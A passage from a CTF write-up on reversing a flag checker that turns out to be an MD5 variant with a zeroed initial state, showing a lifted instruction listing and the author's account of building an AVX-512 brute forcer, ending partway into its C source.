A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[14]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[15]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[16]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[17]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[18]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[19]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[20]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[21]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[22]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[23]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[24]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] &amp; A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] &amp; A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[25]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[26]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[27]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[28]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[29]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[30]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[31]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[32]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[33]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[34]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[35]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[36]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[37]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[38]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[39]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[40]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] &amp; A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] &amp; A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[41]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[42]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[43]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[44]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[45]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[46]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[47]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[48]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[49]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[50]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[51]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[52]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[53]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[54]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[55]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[56]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[57]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[58]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[59]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[60]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[61]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[62]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[63]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[64]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[65]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[66]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[67]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[68]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[69]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[70]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[71]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[72]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[73]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[125] + A[0]
A[0] = A[5] | A[8]
A[5] = A[126] + A[1]
A[1] = A[5] | A[8]
A[5] = A[127] + A[2]
A[2] = A[5] | A[8]
A[5] = A[128] + A[3]
A[3] = A[5] | A[8]</code>
</pre></div>

<h3 id="failing-with-z3">Failing with z3</h3>

<p>The last thing to do now was to pass everything into z3, and <em>boom</em> get the flag… right? Well,
it turned out not to be that simple. I had z3 running for a half an hour but still no output, so what
was going on?</p>

<p>I went back to the Ghidra decompilation for any clues to make it go faster. Apparently, I had missed
something; a reference to <code class="language-plaintext highlighter-rouge">__ctype_b_loc()</code> in the code. <code class="language-plaintext highlighter-rouge">__ctype_b_loc()</code> is a libc function that
is used in the implementations of certain C functions like <code class="language-plaintext highlighter-rouge">isalpha()</code> and <code class="language-plaintext highlighter-rouge">isdigit()</code>. More
specifically, it returns a <code class="language-plaintext highlighter-rouge">const unsigned short int* ctype_b_values[]</code> where each entry contains a
16-bit bitmask in which the <code class="language-plaintext highlighter-rouge">n</code>th bit encodes the return value of one of the <code class="language-plaintext highlighter-rouge">is*****()</code> functions.</p>

<p>Where is this used, you may ask? After the long stream of <code class="language-plaintext highlighter-rouge">if</code> statements, the program iterates
through each byte of the flag (inside <code class="language-plaintext highlighter-rouge">corctf{...}</code>), and terminates the loop early if
<code class="language-plaintext highlighter-rouge">(ctype_b_values[flag[i]] &amp; 8) == 0</code>. The 3rd bit corresponds to <code class="language-plaintext highlighter-rouge">isalnum()</code>, and a set bit means
that the byte is alphanumeric. Therefore, the flag has to be <strong>alphanumeric</strong>.</p>

<p>I applied this new constraint to z3 hoping it would output a solution this time, but was gutted to
find that it <em>still</em>, would not budge.</p>

<p>However, this presents some new useful information; the brute force calculation is not
<code class="language-plaintext highlighter-rouge">69,833,729,609,375</code>, but <code class="language-plaintext highlighter-rouge">50*62^6 = 2,840,011,779,200</code>. That’s nearly a 25x improvement, but still
no easy task. Even if each of the 865 instructions I would have to execute accounted for one clock
cycle, it would still take <code class="language-plaintext highlighter-rouge">2,840,011,779,200 * 865 / (2*10^9) / 60 / 60 ~ 341 hours</code> on a typical 2
GHz computer.</p>

<p>At this point we had 14 hours left to the CTF, and it was also 3AM so I wanted to go to sleep. As
one final effort for the night, I Googled one of the mysterious hexadecimal constants in the code to
see if anything would pop up.</p>

<p>I wasn’t expecting any results, until I started seeing <a href="https://en.wikipedia.org/wiki/MD5">MD5</a> pop
up! Could it be that this entire program was implementing MD5? Indeed after testing the program with
different inputs, it was in fact MD5, but not entirely. Normally, the MD5 state is initialized to
<code class="language-plaintext highlighter-rouge">0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476</code>, but in the program these are all set to zero.
Let’s just call this variant <em>MD5-0</em>.</p>

<p>In any case, I went to sleep with this knowledge hoping to crack this the next day.</p>

<h3 id="the-next-day">The next day</h3>

<p>(I woke up <del>bright and early</del> at 11AM the next morning)</p>

<p>Since no
<a href="https://crypto.stackexchange.com/a/41865">preimage attack</a> on MD5 is known, the only option was to
brute force <em>MD5-0</em> over <code class="language-plaintext highlighter-rouge">2,840,011,779,200</code> possibilities, where the correct flag should produce a
suffix of <code class="language-plaintext highlighter-rouge">19c603ba14353ce4</code>.</p>

<p>To test the feasibility of the brute force, I grabbed an online C
implementation of <a href="https://github.com/robertaboukhalil/md5/blob/master/md5.c">MD5</a>  and measured its
speed. The baseline single-threaded performance on my machine reached around <code class="language-plaintext highlighter-rouge">8*10^6</code> hashes per second. While this seemed relatively fast to me, the actual running time on 4 cores would be a
daunting <code class="language-plaintext highlighter-rouge">2,840,011,779,200 / (8*10^6) / 60 / 60 / 4 ~ 25 hours</code>.</p>

<p>Optimizing the program by making use of the fact that the flag was always 11 bytes long and
unrolling all of the loops, I was still only able to reach <code class="language-plaintext highlighter-rouge">1.3*10^7</code> hashes per second, or
<code class="language-plaintext highlighter-rouge">15 hours</code>. Still not nearly fast enough!</p>

<h3 id="vectorization-is-op">Vectorization is OP</h3>

<p>A common “cheat” to magically increase a program’s speed is by using x86 SIMD instructions to perform
vectorized operations on more than 64 bits at a time. Luckily, my computer supported <code class="language-plaintext highlighter-rouge">AVX-512</code>, an
instruction set that allows performing 16 32-bit operations in parallel.</p>

<p>I wrote a new MD5 implementation from scratch utilizing these instructions called <code class="language-plaintext highlighter-rouge">md5_avx512</code>, which
could hash 16 11-byte strings. I was expecting maybe a 4-8x speedup, but it ended up being able to
computer hashes 16x faster, which is the theoretical optimum! This brought the estimated time to
just under an hour, which might just be fast enough.</p>

<p>By the time I finished writing the program, we only had one hour left on the clock. Regardless, I
ran the program and waited for a miracle. Unfortunately, it took longer than expected, as it had only
reached halfway done with only 10 minutes left on the clock. I held out for a clutch victory, but
it did not come.</p>

<h3 id="two-stupid-bugs">Two stupid bugs</h3>

<p>After the CTF concluded I kept my program running, but it actually finished without finding any
solution! To my (annoyed) disbelief, I ended up making two stupid bugs. One of which was using the
flipped endianness for the target suffix, and the other was applying <code class="language-plaintext highlighter-rouge">#pragma omp parallel for</code>
without realizing that it was overwriting variables between threads!</p>

<p>After fixing these bugs, I was at last able to run the multi-threaded, AVX-512 optimized
<em>MD5-0</em> brute forcer without any issues:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// gcc -O3 -march=native -o brute brute.c &amp;&amp; ./brute</span>

<span class="cp">#include</span> <span class="cpf">&lt;immintrin.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;pthread.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span>
<span class="cp">#define AVX512_F 0xca
#define AVX512_G 0xe4
#define AVX512_H 0x96
#define AVX512_I 0x39
</span>
<span class="cp">#define AVX512_STEP(f, a, b, c, d, r, k) { \
    (a) = _mm512_add_epi32((a), _mm512_add_epi32(_mm512_ternarylogic_epi32((b), (c), (d), (f)), (k))); \
    (a) = _mm512_add_epi32(_mm512_rol_epi32((a), (r)), (b)); \
}
</span>
<span class="cp">#define T0 0xba03c619
#define T1 0xe43c3514
</span>
